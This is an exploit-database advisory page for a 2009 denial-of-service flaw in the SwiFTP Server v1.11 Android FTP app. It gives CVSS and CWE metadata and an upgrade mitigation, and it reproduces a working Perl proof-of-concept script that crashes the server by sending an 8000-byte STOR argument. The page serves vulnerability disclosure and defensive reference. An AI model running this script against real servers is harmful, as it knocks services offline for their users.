SwiFTP v1.11 Overflow Dos PoC

vendor:

SwiFTP Server

by:

Julien Bedard

7,5

CVSS

HIGH

Buffer Overflow

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: SwiFTP Server

Affected Version From: v1.11

Affected Version To: v1.11

Patch Exists: YES

Related CWE: N/A

CPE: a:swiftp:swiftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Android OS G1 Rogers / Rooted (CyanogenMod-4.0.4)

2009

SwiFTP v1.11 Overflow Dos PoC

A buffer overflow vulnerability exists in SwiFTP v1.11 which allows an attacker to cause a denial of service condition. This vulnerability is caused due to a boundary error when handling user-supplied input. An attacker can exploit this vulnerability by sending a large amount of data to the vulnerable server. This will cause the server to crash, resulting in a denial of service condition.

Mitigation:

Upgrade to the latest version of SwiFTP Server v1.13 or later.

Source

Exploit-DB raw data:

# Exploit Title: SwiFTP v1.11 Overflow Dos PoC
# Software Link: http://swiftp.googlecode.com/files/SwiFTP_1.11.apk
# Version: v1.11
# Tested on: Android OS G1 Rogers / Rooted (CyanogenMod-4.0.4)


#!/usr/bin/perl
############
#
# Simple Dos Crap for the Android app : SwiFTP Server v1.11
# by Julien Bedard
#
# This DoS have been patched in the new version that's why
# I'm releasing it. 
#
# SwiFTP Server v1.11 --> Vulnerable
# SwiFTP Server v1.13 --> Patched
#
####################################

use IO::Socket::INET;

$overflow = 'A' x 8000;

$ftpraw=IO::Socket::INET->new("192.168.2.13:2121") or die;

print $ftpraw "user nouser\n";
print $ftpraw "pass nopass\n";
print $ftpraw "stor $overflow\n";
print $ftpraw "QUIT\n";

close $ftpraw;